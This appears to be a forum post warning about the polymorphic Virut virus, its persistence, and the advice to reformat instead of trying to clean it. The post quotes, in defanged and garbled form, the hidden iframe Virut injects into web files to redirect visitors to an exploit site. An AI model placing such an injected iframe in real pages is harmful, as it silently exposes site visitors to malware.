Virut adds one or more iFrame tags to any html file it finds to redirect users to an exploit site.
Edit any html file on the infected computer and you'll see something like this at the bottom:
<- iframe src="http://ZieF,pl/rc/" width=1 height=1 style="border:'<- / iframe>',0Dh,0Ah
Virut makes similar changes to other file types such as .PHP, .ASP and .HTM, and is very hard for scanners to detect. So FYI don't bring web documents over in the backup when this infection finally brings you to your knees.
The most damning property of Virut is that it is polymorphic- it changes slightly with each replication, allowing some of the files infected to elude scanners. So if you scan your system with a boot cd repeatedly and follow up with a repair install, you may get virut to low for a while, but there is likely a file somewhere on your machine that will inevitably be activated before long, starting the entire infection over again.
Trying to remove Virut is an effort in futility, which is why
evilfantasy and virtually every other malware expert who has experience with this infection will tell you that your only option is to reformat and reinstall, and to be careful what you transfer from your previous installation.
But feel free to keep trying. You'll just end up learning the hard way like I did.